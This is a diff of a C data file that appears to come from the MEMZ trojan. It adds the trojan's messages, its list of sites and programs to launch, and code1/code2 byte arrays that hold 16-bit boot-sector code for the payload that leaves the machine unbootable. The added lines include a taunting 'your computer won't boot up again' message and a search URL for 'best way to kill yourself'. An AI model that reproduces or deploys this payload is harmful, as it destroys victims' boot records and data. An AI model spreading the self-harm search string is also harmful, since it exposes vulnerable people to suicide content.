0x00, 0x03, - 0x8E, 0x05, 0x02, 0xFA, 0x04, 0x81, 0xDC, 0xD0, 0x03, 0xA2, 0x04, 0x80, - 0x77, 0x03, 0xEA, 0x04, 0x03, 
0xEE, 0x04, 0x03, 0x55, 0x1A, 0x83, 0xAA, - 0xAA, 0xAA, 0xAA, 0x04, 0x10, 0x04, 0x04, 0x10, 0x08, 0x04, 0x16, 0x0A, - 0x85, 0x0A, 0x00, 0x70, 0x70, 0x00, 0xEE, 0x02, 0xF9, 0x07, 0x03, 0x98, - 0x05, 0x80, 0xF0, 0x04, 0x38, 0x04, 0x80, 0x70, 0x04, 0x3B, 0x05, 0x03, - 0xA6, 0x19, 0x83, 0xA3, 0xA3, 0xA3, 0xA3, 0x04, 0x60, 0x04, 0x83, 0x33, - 0x33, 0x33, 0x33, 0x04, 0x68, 0x04, 0x04, 0x60, 0x0D, 0x83, 0x03, 0x00, - 0xEE, 0xDE, 0x02, 0xF1, 0x04, 0x03, 0x96, 0x07, 0x81, 0x77, 0x70, 0x04, - 0x3F, 0x04, 0x04, 0x8C, 0x04, 0x04, 0x46, 0x1A, 0x04, 0x68, 0x08, 0x87, - 0x39, 0x39, 0x39, 0x39, 0xF9, 0x39, 0x39, 0x39, 0x04, 0xB0, 0x0C, 0x9A, - 0x39, 0x30, 0x00, 0xE0, 0xEE, 0xEE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, 0xDE, - 0xDE, 0x0E, 0x70, 0x77, 0x77, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, 0x07, - 0x77, 0x70, 0x01, 0x03, 0xA7, 0x19, 0x83, 0x99, 0x99, 0x99, 0x99, 0x05, - 0x00, 0x04, 0x81, 0x99, 0x9F, 0x05, 0x04, 0x06, 0x05, 0x00, 0x09, 0x88, - 0x99, 0x99, 0x99, 0x00, 0x77, 0x77, 0x70, 0x00, 0x01, 0x03, 0x88, 0x04, - 0x83, 0x01, 0x01, 0x01, 0x01, 0x05, 0x21, 0x06, 0x05, 0x2B, 0x05, 0x03, - 0x05, 0x1B, 0x83, 0x91, 0x91, 0x91, 0x91, 0x05, 0x50, 0x04, 0x05, 0x48, - 0x10, 0x05, 0x5C, 0x04, 0x05, 0x27, 0x04, 0x05, 0x6A, 0x05, 0x05, 0x59, - 0x07, 0x05, 0x6D, 0x07, 0x01, 0xB8, 0x98, 0x00, 0x9F, 0xF1, 0x06, 0x99, - 0x73, 0x05, 0xAC, 0x93, 0x07, 0x7F, 0x06, 0x07, 0x7F, 0x4B, 0x82, 0xF1, - 0x11, 0x1F, 0x05, 0xAB, 0xFF, 0x08, 0xAA, 0xBB, 0x02, 0x50, 0xF9, 0x03, - 0x48, 0x05, 0x03, 0x4E, 0x05, 0x80, 0x11, 0x03, 0x53, 0x1C, 0x03, 0x70, - 0x18, 0x84, 0xEE, 0xE0, 0xE0, 0xEE, 0xEE, 0x03, 0x8D, 0x0C, 0x03, 0x98, - 0x08, 0x81, 0xE0, 0x00, 0x03, 0xA2, 0x1D, 0x03, 0xC0, 0x18, 0x04, 0x44, - 0x04, 0x81, 0xE0, 0xE0, 0x03, 0xDE, 0x0A, 0x80, 0xDD, 0x03, 0xE8, 0x27, - 0x04, 0x11, 0x1A, 0x83, 0x70, 0x70, 0x77, 0x77, 0x04, 0x2E, 0x0A, 0x04, - 0x37, 0x28, 0x04, 0x60, 0x1C, 0x80, 0x03, 0x04, 0x7D, 0x0B, 0x04, 0x87, - 0x28, 0x04, 0xC0, 0x0D, 0x04, 0xBD, 0x10, 0x80, 0x39, 0x04, 0xCE, 0x0B, - 0x04, 0xD8, 0x27, 0x05, 0x10, 
0x0C, 0x0C, 0xD0, 0x0C, 0x05, 0x17, 0x08, - 0x05, 0x20, 0x0B, 0x05, 0x2A, 0x25, 0x05, 0x62, 0x06, 0x80, 0xF1, 0x05, - 0x57, 0x15, 0x05, 0x71, 0x07, 0x05, 0x72, 0x11, 0x05, 0x82, 0x2A, 0x05, - 0xAD, 0xFF, 0x06, 0xB1, 0xFF, 0x07, 0xB5, 0xAE, 0x81, 0x11, 0x11, 0x01, - 0x92, 0x4F, 0x00, 0xDC, 0xB5, 0x0E, 0xFC, 0x9C, 0x00, 0x4B, 0x54, 0x0A, - 0x59, 0x15, 0x12, 0x25, 0x0A, 0x84, 0x10, 0x0E, 0x0E, 0x0E, 0x0E, 0x12, - 0x40, 0x04, 0x12, 0x40, 0x08, 0x0A, 0x81, 0x1F, 0x80, 0x11, 0x0A, 0xA9, - 0x15, 0x12, 0x75, 0x09, 0x83, 0x00, 0xEE, 0xEE, 0xED, 0x0C, 0x04, 0x05, - 0x80, 0xDC, 0x0B, 0xB5, 0x04, 0x0A, 0xCD, 0x05, 0x0A, 0xD1, 0x41, 0x0C, - 0x01, 0x08, 0x82, 0xDD, 0xD0, 0xD0, 0x12, 0x99, 0x04, 0x12, 0xA1, 0x04, - 0x0A, 0x2F, 0x1B, 0x0B, 0x49, 0x10, 0x13, 0x10, 0x0E, 0x0B, 0x5E, 0x08, - 0x12, 0x9A, 0x04, 0x80, 0x00, 0x0B, 0x6C, 0x04, 0x03, 0x4F, 0x06, 0x0B, - 0x75, 0x1B, 0x0B, 0x99, 0x0F, 0x0B, 0x98, 0x0F, 0x13, 0x2E, 0x05, 0x12, - 0x9A, 0x05, 0x0C, 0x57, 0x07, 0x0C, 0xB1, 0x05, 0x0B, 0x74, 0x1C, 0x04, - 0x10, 0x1A, 0x82, 0xA0, 0xA0, 0xA0, 0x03, 0xDD, 0x04, 0x13, 0x83, 0x06, - 0x80, 0xCD, 0x13, 0x89, 0x05, 0x80, 0x7F, 0x0C, 0x64, 0x04, 0x13, 0xDB, - 0x06, 0x0C, 0x68, 0x1F, 0x0C, 0x30, 0x11, 0x0B, 0x72, 0x04, 0x04, 0x2C, - 0x05, 0x13, 0x32, 0x0B, 0x80, 0x77, 0x13, 0x91, 0x05, 0x80, 0x07, 0x14, - 0x2C, 0x05, 0x13, 0xE8, 0x18, 0x0C, 0x89, 0x15, 0x14, 0x55, 0x04, 0x88, - 0x03, 0x03, 0x03, 0x03, 0x33, 0x00, 0xEE, 0xEE, 0xDE, 0x12, 0xE2, 0x07, - 0x80, 0x0D, 0x0C, 0x64, 0x05, 0x81, 0x70, 0x70, 0x04, 0x2B, 0x04, 0x80, - 0x77, 0x0C, 0xB5, 0x1A, 0x05, 0x0E, 0x0E, 0x0C, 0xDD, 0x11, 0x84, 0x07, - 0xE0, 0xE0, 0xE0, 0xE0, 0x14, 0xC0, 0x04, 0x87, 0xE0, 0xE0, 0xE0, 0x00, - 0x70, 0x70, 0x70, 0x70, 0x14, 0xCC, 0x04, 0x80, 0x70, 0x04, 0xE5, 0x1B, - 0x81, 0xF1, 0x1F, 0x11, 0xCF, 0x05, 0x05, 0x50, 0x17, 0x80, 0x00, 0x14, - 0xD4, 0x04, 0x82, 0x01, 0x70, 0x70, 0x14, 0x38, 0x07, 0x15, 0x13, 0x05, - 0x15, 0x13, 0x0A, 0x05, 0xAD, 0xFF, 0x0F, 0xE2, 0xE7, 0x0F, 0xD9, 0x93, - 0x05, 0xAC, 0xFF, 0x16, 0x23, 
0xA0, 0x17, 0xA5, 0x04, 0x08, 0x18, 0x4D, - 0x08, 0x14, 0x5B, 0x12, 0x20, 0xFF, 0x13, 0x1F, 0xAD, 0x81, 0x07, 0x07, - 0x13, 0xCE, 0x4A, 0x83, 0xA0, 0x07, 0x77, 0x70, 0x14, 0x1C, 0x4C, 0x84, - 0x03, 0x70, 0x70, 0x03, 0x33, 0x14, 0x6D, 0x34, 0x14, 0xA2, 0x1C, 0x81, - 0x90, 0x07, 0x14, 0xBF, 0x31, 0x05, 0x49, 0x1D, 0x15, 0x0E, 0xFF, 0x18, - 0x97, 0xFF, 0x08, 0x15, 0x94, 0x14, 0xF0, 0x07, 0x05, 0xAD, 0xFF, 0x16, - 0x2D, 0xFF, 0x20, 0x84, 0x4C, 0x0A, 0x50, 0x1E, 0x81, 0x44, 0x40, 0x1A, - 0x10, 0x30, 0x0A, 0xA0, 0x20, 0x1A, 0x60, 0x5A, 0x81, 0xD0, 0xD0, 0x22, - 0x38, 0x05, 0x0B, 0x21, 0x04, 0x21, 0xF1, 0x1B, 0x0B, 0x40, 0x19, 0x1B, - 0x49, 0x0A, 0x22, 0x34, 0x06, 0x1B, 0x0A, 0x07, 0x81, 0xDD, 0xEE, 0x14, - 0x18, 0x04, 0x03, 0xA6, 0x31, 0x81, 0xE0, 0x07, 0x03, 0x89, 0x04, 0x0B, - 0xAD, 0x06, 0x1B, 0xA1, 0x06, 0x1B, 0x5A, 0x26, 0x1B, 0x7F, 0x18, 0x81, - 0x0A, 0x0A, 0x1C, 0xA2, 0x04, 0x1B, 0x9D, 0x0B, 0x1B, 0xA9, 0x27, 0x0C, - 0x2F, 0x21, 0x22, 0xD1, 0x0B, 0x1B, 0xFC, 0x24, 0x0C, 0x7F, 0x1E, 0x80, - 0x30, 0x1C, 0x3E, 0x0A, 0x1C, 0x49, 0x27, 0x1C, 0x6F, 0x1C, 0x80, 0x90, - 0x23, 0x18, 0x06, 0x1C, 0x93, 0x2E, 0x05, 0x50, 0x1B, 0x15, 0x0E, 0xFF, - 0x10, 0xD9, 0xF8, 0x80, 0xF1, 0x26, 0x50, 0x4D, 0x00, 0x9E, 0x47, 0x82, - 0xF1, 0xF1, 0x1F, 0x26, 0xA2, 0x4E, 0x05, 0xAB, 0xFF, 0x06, 0xE0, 0xFF, - 0x21, 0xB6, 0xD3, 0x03, 0x49, 0x05, 0x22, 0x8E, 0x05, 0x03, 0x53, 0x35, - 0x0B, 0x58, 0x0E, 0x23, 0xC5, 0x08, 0x03, 0x9E, 0x3A, 0x0B, 0xA8, 0x0B, - 0x2A, 0x0A, 0x05, 0x03, 0xE8, 0x41, 0x0B, 0xF9, 0x08, 0x23, 0x71, 0x0B, - 0x04, 0x3C, 0x40, 0x23, 0xBC, 0x10, 0x04, 0x8C, 0x30, 0x23, 0xFC, 0x1C, - 0x24, 0x17, 0x05, 0x0C, 0xAE, 0x22, 0x80, 0x1F, 0x24, 0x40, 0x1D, 0x80, - 0x77, 0x24, 0x5E, 0x0C, 0x86, 0xE0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, - 0x0C, 0xF4, 0x04, 0x29, 0x0C, 0x1B, 0x24, 0x90, 0x20, 0x2C, 0x7B, 0x05, - 0x2C, 0x6B, 0x05, 0x24, 0xAB, 0x0F, 0x00, 0x38, 0xFF, 0x2D, 0x19, 0x7F, - 0x2C, 0xFF, 0x4E, 0x27, 0x37, 0x98, 0x26, 0x9D, 0x9A, 0x05, 0xAD, 0xFF, - 0x25, 0xF5, 0x5A, 0x1F, 0x6F, 
0x40, 0x0A, 0x20, 0x30, 0x19, 0xF0, 0x1E, - 0x80, 0x10, 0x0A, 0x6F, 0x31, 0x1A, 0x40, 0x20, 0x02, 0xF0, 0x80, 0x1A, - 0xE0, 0x18, 0x0D, 0x01, 0x04, 0x80, 0x60, 0x1A, 0xFD, 0x09, 0x03, 0x96, - 0x2A, 0x1B, 0x30, 0x18, 0x80, 0x0E, 0x03, 0xD9, 0x87, 0x1B, 0xD0, 0x18, - 0x33, 0x4A, 0x05, 0x04, 0x7D, 0x33, 0x14, 0x50, 0x19, 0x33, 0x9B, 0x04, - 0x04, 0xCD, 0x29, 0x30, 0xA1, 0x0A, 0x0C, 0xD1, 0x1F, 0x05, 0x1F, 0x25, - 0x1E, 0x89, 0x13, 0x2C, 0x60, 0x15, 0x05, 0x6C, 0x27, 0x08, 0x12, 0xFF, - 0x30, 0x33, 0xFD, 0x07, 0xBE, 0xFF, 0x2D, 0x1A, 0xFF, 0x2E, 0x19, 0x93, - 0x31, 0x36, 0x0B, 0x80, 0xF0, 0x31, 0x3C, 0xED, 0x0B, 0x19, 0x27, 0x1A, - 0xE0, 0x19, 0x81, 0x60, 0x60, 0x1A, 0xFB, 0x0B, 0x0B, 0x66, 0x2A, 0x32, - 0xA0, 0x18, 0x0B, 0xA8, 0x88, 0x33, 0x40, 0x1C, 0x0C, 0x4C, 0x34, 0x33, - 0x90, 0x1D, 0x80, 0x33, 0x0C, 0x9E, 0x1F, 0x35, 0xE0, 0x13, 0x0C, 0xD0, - 0x50, 0x24, 0x89, 0x1D, 0x0D, 0x3D, 0x1D, 0x0F, 0xD9, 0xFF, 0x06, 0xBC, - 0xFF, 0x0F, 0x88, 0xFF, 0x10, 0x84, 0xFF, 0x26, 0x54, 0xCA, 0x21, 0xC0, - 0xCA, 0x1A, 0xBA, 0x26, 0x22, 0xB0, 0x29, 0x1B, 0x09, 0x27, 0x2A, 0xD0, - 0x18, 0x42, 0x4A, 0x06, 0x13, 0x7E, 0x82, 0x2B, 0x70, 0x18, 0x14, 0x18, - 0x38, 0x2B, 0xC0, 0x19, 0x84, 0x09, 0x09, 0x09, 0x09, 0x39, 0x1C, 0x3E, - 0x4F, 0x14, 0xBD, 0x33, 0x05, 0x50, 0x1C, 0x24, 0xA9, 0x15, 0x80, 0xF1, - 0x15, 0x22, 0xFF, 0x16, 0x51, 0xFF, 0x17, 0x50, 0xFF, 0x18, 0x4D, 0xFF, - 0x36, 0x7C, 0xD2, 0x41, 0x00, 0xFF, 0x41, 0xFF, 0xAD, 0x1B, 0x9C, 0x34, - 0x42, 0xE0, 0x18, 0x80, 0x30, 0x1B, 0xE9, 0x37, 0x43, 0x30, 0x18, 0x84, - 0x09, 0x70, 0x70, 0x09, 0x39, 0x43, 0x4D, 0x50, 0x1C, 0x8D, 0x33, 0x43, - 0xD0, 0x1D, 0x43, 0xEE, 0x0C, 0x82, 0xF1, 0xF1, 0x1F, 0x24, 0xBA, 0x4F, - 0x46, 0x55, 0xD1, 0x1E, 0x3B, 0xFF, 0x01, 0x5B, 0x37, 0x05, 0xAD, 0xFF, - 0x16, 0x29, 0xFF, 0x4F, 0x30, 0x80, 0x19, 0xF0, 0xCA, 0x22, 0x8A, 0x26, - 0x1A, 0xE0, 0x29, 0x22, 0xD9, 0x27, 0x3A, 0x70, 0x17, 0x23, 0x17, 0x89, - 0x3B, 0x10, 0x20, 0x23, 0xC0, 0x30, 0x33, 0x90, 0x1F, 0x24, 0x0F, 0x81, - 0x4B, 0x99, 0x1B, 0x4B, 0xBD, 
0x04, 0x44, 0x01, 0x05, 0x40, 0x84, 0x06, - 0x4B, 0xCC, 0x48, 0x2F, 0x50, 0xD0, 0x3F, 0xE2, 0x9D, 0x40, 0x81, 0x04, - 0x2F, 0x01, 0xFF, 0x05, 0xAD, 0xFF, 0x06, 0xFA, 0xFF, 0x50, 0x80, 0xE9, - 0x2A, 0x59, 0x27, 0x3A, 0x20, 0x26, 0x2A, 0xA6, 0x2A, 0x3A, 0x70, 0x23, - 0x2A, 0xF3, 0x7D, 0x52, 0x80, 0x2C, 0x33, 0x6C, 0x3B, 0x80, 0x3F, 0x52, - 0xE8, 0x10, 0x2B, 0xE8, 0x27, 0x53, 0x1F, 0x16, 0x80, 0xF9, 0x5B, 0x02, - 0x04, 0x2C, 0x2A, 0x35, 0x53, 0x6F, 0x15, 0x80, 0xF1, 0x5B, 0x45, 0x05, - 0x80, 0xF1, 0x2C, 0x7B, 0x31, 0x08, 0x4A, 0xFF, 0x57, 0x90, 0x97, 0x5C, - 0xD1, 0x4F, 0x5D, 0x22, 0x4F, 0x87, 0x7E, 0x27, 0x12, 0x27, 0x4C, 0x46, - 0xB8, 0x44, 0x5D, 0xC0, 0x05, 0x8E, 0x26, 0xB8, 0x24, 0x34, 0x24, 0xBF, - 0x23, 0x34, 0x24, 0x00, 0x25, 0xB8, 0x44, 0x4C, 0x46, 0x5D, 0xC0, 0x08, - 0x5D, 0xD4, 0x05, 0xA0, 0x24, 0x34, 0x24, 0x89, 0x23, 0xBF, 0x23, 0x89, - 0x23, 0x34, 0x24, 0x4C, 0x46, 0x9D, 0x45, 0x7E, 0x27, 0x7E, 0x27, 0x70, - 0x49, 0xF0, 0x27, 0x68, 0x28, 0x70, 0x29, 0x70, 0x69, 0x68, 0x48, 0xF0, - 0x47, 0x5D, 0xFE, 0x06, 0x87, 0x68, 0x28, 0x7E, 0x27, 0x4C, 0x26, 0x9D, - 0x25, 0x5E, 0x12, 0x04, 0x5E, 0x10, 0x04, 0x5E, 0x0E, 0x04, 0x85, 0x70, - 0x29, 0x7E, 0x47, 0x4C, 0x46, 0x5E, 0x16, 0x0C, 0x83, 0xF0, 0x27, 0x7E, - 0x27, 0x5E, 0x0A, 0x08, 0x81, 0xF0, 0x47, 0x5E, 0x0E, 0x08, 0x5E, 0x46, - 0x04, 0x5E, 0x3C, 0x05, 0x84, 0x48, 0x70, 0x49, 0x68, 0x48, 0x5D, 0xF4, - 0x66, 0x85, 0x70, 0x49, 0x99, 0x2C, 0x39, 0x2B, 0x5E, 0xC0, 0x06, 0x5E, - 0xAA, 0x06, 0x83, 0x70, 0x29, 0x12, 0x27, 0x5D, 0xC8, 0x06, 0x81, 0x70, - 0x49, 0x5E, 0xC6, 0x08, 0x81, 0x99, 0x2C, 0x5E, 0xD4, 0x04, 0x5E, 0xB6, - 0x04, 0x87, 0x99, 0x2C, 0xFB, 0x2E, 0x24, 0x2E, 0x99, 0x2C, 0x5E, 0xC0, - 0x0E, 0x5E, 0xCC, 0x08, 0x5F, 0x00, 0x04, 0x5E, 0xF6, 0x04, 0x83, 0x70, - 0x29, 0x00, 0x2A, 0x5F, 0x0C, 0x06, 0x5E, 0xD2, 0x0C, 0x81, 0x00, 0x4A, - 0x5E, 0xC0, 0x6C, 0xBC, 0x68, 0x48, 0x59, 0x6F, 0x75, 0x72, 0x20, 0x63, - 0x6F, 0x6D, 0x70, 0x75, 0x74, 0x65, 0x72, 0x20, 0x68, 0x61, 0x73, 0x20, - 0x62, 0x65, 0x65, 0x6E, 0x20, 
0x74, 0x72, 0x61, 0x73, 0x68, 0x65, 0x64,
- 0x20, 0x62, 0x79, 0x20, 0x74, 0x68, 0x65, 0x20, 0x4D, 0x45, 0x4D, 0x5A,
- 0x20, 0x74, 0x72, 0x6F, 0x6A, 0x61, 0x6E, 0x2E, 0x20, 0x4E, 0x6F, 0x77,
- 0x20, 0x65, 0x6E, 0x6A, 0x6F, 0x5F, 0xBC, 0x06, 0x8A, 0x4E, 0x79, 0x61,
- 0x6E, 0x20, 0x43, 0x61, 0x74, 0x2E, 0x2E, 0x2E
-};
-
-const size_t code1_len = sizeof(code1);
-const size_t code2_len = sizeof(code2);
-const size_t msg_len = sizeof(msg);
+#include "data.h"
+
+#ifndef CLEAN
+const unsigned char msg[] = "YOUR COMPUTER HAS BEEN FUCKED BY THE MEMZ TROJAN.\r\n\r\nYour computer won't boot up again,\r\nso use it as long as you can!\r\n\r\n:D\r\n\r\nTrying to kill MEMZ will cause your system to be\r\ndestroyed instantly, so don't try it :D";
+#endif
+
+const char *sites[] = {
+ "http://google.co.ck/search?q=best+way+to+kill+yourself",
+ "http://google.co.ck/search?q=how+2+remove+a+virus",
+ "http://google.co.ck/search?q=mcafee+vs+norton",
+ "http://google.co.ck/search?q=how+to+send+a+virus+to+my+friend",
+ "http://google.co.ck/search?q=minecraft+hax+download+no+virus",
+ "http://google.co.ck/search?q=how+to+get+money",
+ "http://google.co.ck/search?q=bonzi+buddy+download+free",
+ "http://google.co.ck/search?q=how+2+buy+weed",
+ "http://google.co.ck/search?q=how+to+code+a+virus+in+visual+basic",
+ "http://google.co.ck/search?q=what+happens+if+you+delete+system32",
+ "http://google.co.ck/search?q=g3t+r3kt",
+ "http://google.co.ck/search?q=batch+virus+download",
+ "http://google.co.ck/search?q=virus.exe",
+ "http://google.co.ck/search?q=internet+explorer+is+the+best+browser",
+ "http://google.co.ck/search?q=facebook+hacking+tool+free+download+no+virus+working+2016",
+ "http://google.co.ck/search?q=virus+builder+legit+free+download",
+ "http://google.co.ck/search?q=how+to+create+your+own+ransomware",
+ "http://google.co.ck/search?q=how+to+remove+memz+trojan+virus",
+ "http://google.co.ck/search?q=my+computer+is+doing+weird+things+wtf+is+happenin+plz+halp",
+ "http://google.co.ck/search?q=dank+memz",
+ "http://google.co.ck/search?q=how+to+download+memz",
+ "http://google.co.ck/search?q=half+life+3+release+date",
+ "http://google.co.ck/search?q=is+illuminati+real",
+ "http://google.co.ck/search?q=montage+parody+making+program+2016",
+ "http://google.co.ck/search?q=the+memz+are+real",
+ "http://google.co.ck/search?q=stanky+danky+maymays",
+ "http://google.co.ck/search?q=john+cena+midi+legit+not+converted",
+ "http://google.co.ck/search?q=vinesauce+meme+collection",
+ "http://google.co.ck/search?q=skrillex+scay+onster+an+nice+sprites+midi",
+ "http://answers.microsoft.com/en-us/protect/forum/protect_other-protect_scanning/memz-malwarevirus-trojan-completely-destroying/268bc1c2-39f4-42f8-90c2-597a673b6b45",
+ "http://motherboard.vice.com/read/watch-this-malware-turn-a-computer-into-a-digital-hellscape",
+ "http://play.clubpenguin.com",
+ "http://pcoptimizerpro.com",
+ "http://softonic.com",
+ "calc",
+ "notepad",
+ "cmd",
+ "write",
+ "regedit",
+ "explorer",
+ "taskmgr",
+ "msconfig",
+ "mspaint",
+ "devmgmt.msc",
+ "control",
+ "mmc",
+};
+
+const size_t nSites = sizeof(sites) / sizeof(void *);
+
+#ifndef CLEAN
+const char *msgs[] = {
+ "YOU KILLED MY TROJAN!\r\nNow you are going to die.",
+ "REST IN PISS, FOREVER MISS.",
+ "I WARNED YOU...",
+ "HAHA N00B L2P G3T R3KT",
+ "You failed at your 1337 h4x0r skillz.",
+ "YOU TRIED SO HARD AND GOT SO FAR, BUT IN THE END, YOUR PC WAS STILL FUCKED!",
+ "HACKER!\r\nENJOY BAN!",
+ "GET BETTER HAX NEXT TIME xD",
+ "HAVE FUN TRYING TO RESTORE YOUR DATA :D",
+ "|\\/|3|\\/|2",
+ "BSOD INCOMING",
+ "VIRUS PRANK (GONE WRONG)",
+ "ENJOY THE NYAN CAT",
+ "Get dank antivirus m9!",
+ "You are an idiot!\r\nHA HA HA HA HA HA HA",
+ "#MakeMalwareGreatAgain",
+ "SOMEBODY ONCE TOLD ME THE MEMZ ARE GONNA ROLL ME",
+ "Why did you even tried to kill MEMZ?\r\nYour PC is fucked anyway.",
+ "SecureBoot sucks.",
+ "gr8 m8 i r8 8/8",
+ "Have you tried turning it off and on again?",
+ "",
+ "Greetings to 
all GAiA members!", + "Well, hello there. I don't believe we've been properly introduced. I'm Bonzi!", + "'This is everything I want in my computer'\r\n - danooct1 2016", + "'Uh, Club Penguin. Time to get banned!'\r\n - danooct1 2016", +}; + +const size_t nMsgs = sizeof(msgs) / sizeof(void *); +#endif + +const char *sounds[] = { + "SystemHand", + "SystemQuestion", + "SystemExclamation" +}; + +const size_t nSounds = sizeof(sounds) / sizeof(void *); + + +#ifndef CLEAN +// Split into 2 parts to save some space. + +const unsigned char code1[] = { + 0xBB, 0xE0, 0x07, 0x8E, 0xC3, 0x8E, 0xDB, 0xB8, 0x04, 0x02, 0xB9, 0x02, + 0x00, 0xB6, 0x00, 0xBB, 0x00, 0x00, 0xCD, 0x13, 0x31, 0xC0, 0x89, 0xC3, + 0x89, 0xC1, 0x89, 0xC2, 0xBE, 0x00, 0x00, 0xBF, 0x00, 0x40, 0xAC, 0x81, + 0xFE, 0x9E, 0x07, 0x73, 0x35, 0x3C, 0x80, 0x73, 0x03, 0xE9, 0x10, 0x00, + 0x24, 0x7F, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, 0x80, 0xF9, 0xFF, 0x75, + 0xF7, 0xE9, 0xE2, 0xFF, 0x88, 0xC4, 0xAC, 0x89, 0xC3, 0xAC, 0x89, 0xF2, + 0x89, 0xDE, 0x81, 0xC6, 0x00, 0x40, 0x88, 0xC1, 0xAC, 0xAA, 0xFE, 0xC9, + 0x80, 0xF9, 0x00, 0x75, 0xF7, 0x89, 0xD6, 0xE9, 0xC4, 0xFF, 0xB0, 0xB6, + 0xE6, 0x43, 0xB8, 0x03, 0x10, 0xB3, 0x00, 0xCD, 0x10, 0xBF, 0x00, 0x00, + 0xBA, 0xC0, 0x9D, 0xB9, 0x00, 0xB8, 0x8E, 0xC1, 0xB8, 0x00, 0x00, 0xB9, + 0xD0, 0x07, 0xF3, 0xAB, 0xBE, 0x9C, 0x9F, 0xBF, 0x00, 0x00, 0xE4, 0x61, + 0x0C, 0x03, 0xE6, 0x61, 0xB3, 0x01, 0x52, 0xB4, 0x86, 0xB9, 0x00, 0x00, + 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, 0x81, 0xFE, 0xE8, 0x9F, 0x7D, 0x04, + 0xAC, 0xB4, 0xF0, 0xAB, 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xE3, 0x56, + 0x89, 0xD6, 0xAD, 0x89, 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, + 0xE6, 0x42, 0xC0, 0xED, 0x05, 0xC0, 0xE5, 0x02, 0x88, 0xEB, 0x89, 0xF2, + 0x5E, 0x81, 0xFA, 0xF4, 0x9D, 0x75, 0xC3, 0xBE, 0x00, 0x40, 0xBF, 0x00, + 0x00, 0xB8, 0xE0, 0x07, 0x8E, 0xD8, 0xB8, 0x00, 0xB8, 0x8E, 0xC0, 0xFE, + 0xCB, 0xE9, 0x20, 0x00, 0xB0, 0xDC, 0xAA, 0xAC, 0xAA, 0x81, 0xFE, 0xC0, + 0x9D, 0x74, 0x42, 0x81, 0xFF, 0xA0, 0x0F, 
0x74, 0x03, 0xE9, 0xEC, 0xFF, + 0x52, 0xB4, 0x86, 0xB9, 0x01, 0x00, 0xBA, 0x00, 0x60, 0xCD, 0x15, 0x5A, + 0xBF, 0x00, 0x00, 0x81, 0xFA, 0x9C, 0x9F, 0x75, 0x03, 0xBA, 0xF4, 0x9D, + 0xFE, 0xCB, 0x80, 0xFB, 0x00, 0x75, 0xCD, 0x56, 0x89, 0xD6, 0xAD, 0x89, + 0xC1, 0x80, 0xE4, 0x1F, 0xE6, 0x42, 0x88, 0xE0, 0xE6, 0x42, 0xC0, 0xED, + 0x05, 0x88, 0xEB, 0x89, 0xF2, 0x5E, 0xE9, 0xB3, 0xFF, 0xBE, 0x00, 0x40, + 0xE9, 0xC1, 0xFF +}; + +const unsigned char code2[] = { + 0x55, 0xAA, 0x83, 0x11, 0x11, 0x11, 0x11, 0x00, 0x00, 0x04, 0x00, 0x00, + 0x08, 0x00, 0x00, 0x10, 0x00, 0x00, 0x20, 0x00, 0x35, 0x0B, 0x83, 0xF1, + 0xF1, 0x11, 0xF1, 0x00, 0x00, 0x4B, 0x00, 0x96, 0x04, 0x80, 0xFF, 0x00, + 0x4F, 0x4F, 0x00, 0x9F, 0x4F, 0x00, 0xEA, 0x53, 0x82, 0x1F, 0xF1, 0x1F, + 0x01, 0x42, 0x4E, 0x00, 0x4E, 0x50, 0x02, 0x12, 0x1F, 0x83, 0x10, 0x10, + 0x10, 0x10, 0x02, 0x50, 0x04, 0x02, 0x50, 0x08, 0x80, 0x10, 0x02, 0x31, + 0x1F, 0x83, 0x14, 0x14, 0x14, 0x14, 0x02, 0x80, 0x04, 0x83, 0x44, 0x44, + 0x44, 0x44, 0x02, 0x88, 0x04, 0x02, 0x80, 0x0E, 0x87, 0x40, 0x0E, 0xEE, + 0xEE, 0xED, 0xED, 0xED, 0xED, 0x02, 0xA2, 0x04, 0x02, 0xA5, 0x05, 0x82, + 0xEE, 0xEE, 0x0E, 0x02, 0x60, 0x1E, 0x02, 0x88, 0x08, 0x83, 0x46, 0x46, + 0x46, 0x46, 0x02, 0xD8, 0x04, 0x02, 0xD0, 0x0E, 0x8C, 0x00, 0xEE, 0xED, + 0xDD, 0xDC, 0xDD, 0xDD, 0xDD, 0xDD, 0xCD, 0xDD, 0xDD, 0xCD, 0x02, 0xF3, + 0x04, 0x83, 0xDD, 0xED, 0xEE, 0x00, 0x02, 0xB3, 0x1D, 0x83, 0x66, 0x66, + 0x66, 0x66, 0x03, 0x20, 0x04, 0x03, 0x20, 0x08, 0x03, 0x22, 0x0E, 0x81, + 0x00, 0xEE, 0x02, 0xFB, 0x05, 0x03, 0x41, 0x04, 0x83, 0xD0, 0x07, 0x07, + 0xD0, 0x02, 0xF9, 0x04, 0x84, 0xEE, 0x00, 0x10, 0x07, 0x07, 0x02, 0xB2, + 0x1A, 0x83, 0x6E, 0x6E, 0x6E, 0x6E, 0x03, 0x70, 0x04, 0x83, 0xEE, 0xEE, + 0xEE, 0xEE, 0x03, 0x78, 0x04, 0x03, 0x70, 0x08, 0x85, 0x00, 0x07, 0x07, + 0x00, 0xE0, 0xEE, 0x03, 0x3E, 0x08, 0x8F, 0xCD, 0xDD, 0xDD, 0x00, 0x77, + 0x77, 0x77, 0x07, 0xD0, 0xD0, 0xD0, 0xE0, 0x07, 0x77, 0x77, 0x77, 0x03, + 0x02, 0x1A, 0x03, 0x78, 0x08, 0x83, 0xEA, 0xEA, 0xEA, 0xEA, 
